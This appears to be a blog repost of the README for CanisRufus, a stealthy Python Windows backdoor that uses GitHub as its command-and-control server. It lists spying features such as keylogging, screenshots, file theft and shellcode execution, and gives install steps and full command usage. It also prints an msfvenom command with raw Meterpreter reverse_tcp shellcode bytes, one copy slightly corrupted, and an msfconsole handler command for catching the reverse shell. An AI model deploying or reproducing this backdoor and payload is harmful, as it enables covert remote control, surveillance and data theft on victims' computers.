canisrufus: A stealthy Python based Windows backdoor that uses Github as a command and control server

by do son · August 23, 2017

CanisRufus

A stealthy Python based Windows backdoor that uses Github as a command and control server.

Features

Encrypted transportation messages (AES) + SHA256 hashing
Generate computer unique id using system information/characteristics (SHA256 hash)
Job IDs are random SHA256 hashes
Retrieve system information
Retrieve Geolocation information (City, Country, lat, long, etc..)
Retrieve running processes/system services/system users/devices (hardware)
Retrieve list of clients
Execute system command
Download files from client
Upload files to client
Execute shellcode
Take screenshot
Lock client’s screen
Keylogger
Lock remote computer’s screen
Shutdown/Restart remote computer
Log off current user
Download file from the WEB
Visit website
Show message box to user
Ability to change check-in time
Ability to add jitter to check-in time to reduce predictability

Setup

For this to work you need:

A Github account (Use a dedicated account! Do not use your personal one!)

Download/Installation

Requirements



Python 2.x

pygithub3 module

PyCrypto module

WMI module

Enum34 module

Netifaces module

pypiwin32 module

git clone https://github.com/maldevel/canisrufus.git

pip install -r requirements.txt

canisrufus.py a script that’s used to enumerate and issue commands to available clients.
client.py the actual backdoor to deploy.

You’re probably going to want to compile client.py into an executable using Pyinstaller

Note: It’s recommended you compile client.py using a 32bit Python installation

Usage

usage: canisrufus.py [-h] [-v] [-id ID] [-jobid JOBID] [-list | -info]

                     [-cmd CMD | -visitwebsite URL | -message TEXT TITLE | -tasks | -services | -users | -devices | -download PATH | -download-fromurl URL | -upload SRC DST | -exec-shellcode FILE | -screenshot | -lock-screen | -shutdown | -restart | -logoff | -force-checkin | -start-keylogger | -stop-keylogger | -git-checkin CHECK | -jitter jit]



      

    

    

 _____             _     ______       __           

/  __ \           (_)    | ___ \     / _|          

| /  \/ __ _ _ __  _ ___ | |_/ /   _| |_ _   _ ___ 

| |    / _` | '_ \| / __||    / | | |  _| | | / __|

| \__/\ (_| | | | | \__ \| |\ \ |_| | | | |_| \__ \

 \____/\__,_|_| |_|_|___/\_| \_\__,_|_|  \__,_|___/

                                                   

                                                   

      



optional arguments:

  -h, --help            show this help message and exit

  -v, --version         show program's version number and exit

  -id ID                Client to target

  -jobid JOBID          Job id to retrieve



  -list                 List available clients

  -info                 Retrieve info on specified client



Commands:

  Commands to execute on a client



  -cmd CMD              Execute a system command

  -visitwebsite URL     Visit website

  -message TEXT TITLE   Show message to user

  -tasks                Retrieve running processes

  -services             Retrieve system services

  -users                Retrieve system users

  -devices              Retrieve devices(Hardware)

  -download PATH        Download a file from a clients system

  -download-fromurl URL

                        Download a file from the web

  -upload SRC DST       Upload a file to the clients system

  -exec-shellcode FILE  Execute supplied shellcode on a client

  -screenshot           Take a screenshot

  -lock-screen          Lock the clients screen

  -shutdown             Shutdown remote computer

  -restart              Restart remote computer

  -logoff               Log off current remote user

  -force-checkin        Force a check in

  -start-keylogger      Start keylogger

  -stop-keylogger       Stop keylogger

  -git-checkin CHECK    Seconds to wait before checking for new commands

  -jitter jit           Percentage of Jitter

Shellcode Exec

$ ./msfvenom -p windows/meterpreter/reverse_tcp -a x86 --platform Windows EXITFUNC=thread LPORT=4444 LHOST=x.x.x.x -f python



No encoder or badchars specified, outputting raw payload

Payload size: 354 bytes

buf =  ""

buf += "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b"

buf += "\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0\xb7"

buf += "\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf"

buf += "\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c"

buf += "\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01"

buf += "\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31"

buf += "\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d"

buf += "\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66"

buf += "\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0"

buf += "\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f"

buf += "\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68"

buf += "\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8"

buf += "\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00"

buf += "\xff\xd5\x6a\x05\x68\xac\x10\x99\x01\x68\x02\x00\x11"

buf += "\x5c\x89\xe6\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea"

buf += "\x0f\xdf\xe0\xff\xd5\x97\x6a\x10\x56\x57\x68\x99\xa5"

buf += "\x74\x61\xff\xd5\x85\xc0\x74\x0a\xff\x4e\x08\x75\xec"

buf += "\xe8\x61\x00\x00\x00\x6a\x00\x6a\x04\x56\x57\x68\x02"

buf += "\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7e\x36\x8b\x36\x6a"

buf += "\x40\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58\xa4\x53"

buf += "\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68\x02\xd9"

buf += "\xc8\x5f\xff\xd5\x83\xf8\x00\x7d\x22\x58\x68\x00\x40"

buf += "\x00\x00\x6a\x00\x50\x68\x0b\x2f\x0f\x30\xff\xd5\x57"

buf += "\x68\x75\x6e\x4d\x61\xff\xd5\x5e\x5e\xff\x0c\x24\xe9"

buf += "\x71\xff\xff\xff\x01\xc3\x29\xc6\x75\xc7\xc3\xbb\xe0"

buf += "\x1d\x2a\x0a\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c"

buf += "\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00"

buf += "\x53\xff\xd5"

Get rid of everything except for the shellcode and stick it in a file:

$ cat shell.txt 

\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x6a\x05\x68\xac\x10\x99\x01\x68\x02\x00\x11\x5c\x89\xe6\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x10\x56\x57\x68\x99\xa5\x74\x61\xff\xd5\x85\xc0\x74\x0a\xff\x4e\x08\x75\xec\xe8\x61\x00\x00\x00\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7e\x36\x8b\x36\x6a\x40\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7d\x22\x58\x68\x00\x40\x00\x00\x6a\x00\x50\x68\x0b\x2f\x0f\x30\xff\xd5\x57\x68\x75\x6e\x4d\x61\xff\xd5\x5e\x5e\xff\x0c\x24\xe9\x71\xff\xff\xff\x01\xc3\x29\xc6\x75\xc7\xc3\xbb\xe0\x1d\x2a\x0a\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5

run the console

 ./msfconsole -x "use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST x.x.x.x; run"

canisrufus: A stealthy Python based Windows backdoor that uses Github as a command and control server

Search

Brilliantly

Content & Links

canisrufus: A stealthy Python based Windows backdoor that uses Github as a command and control server

CanisRufus

Features

Setup

Download/Installation

Contents

Usage

Shellcode Exec

Source: https://github.com/maldevel/canisrufus

Search

Brilliantly

Content & Links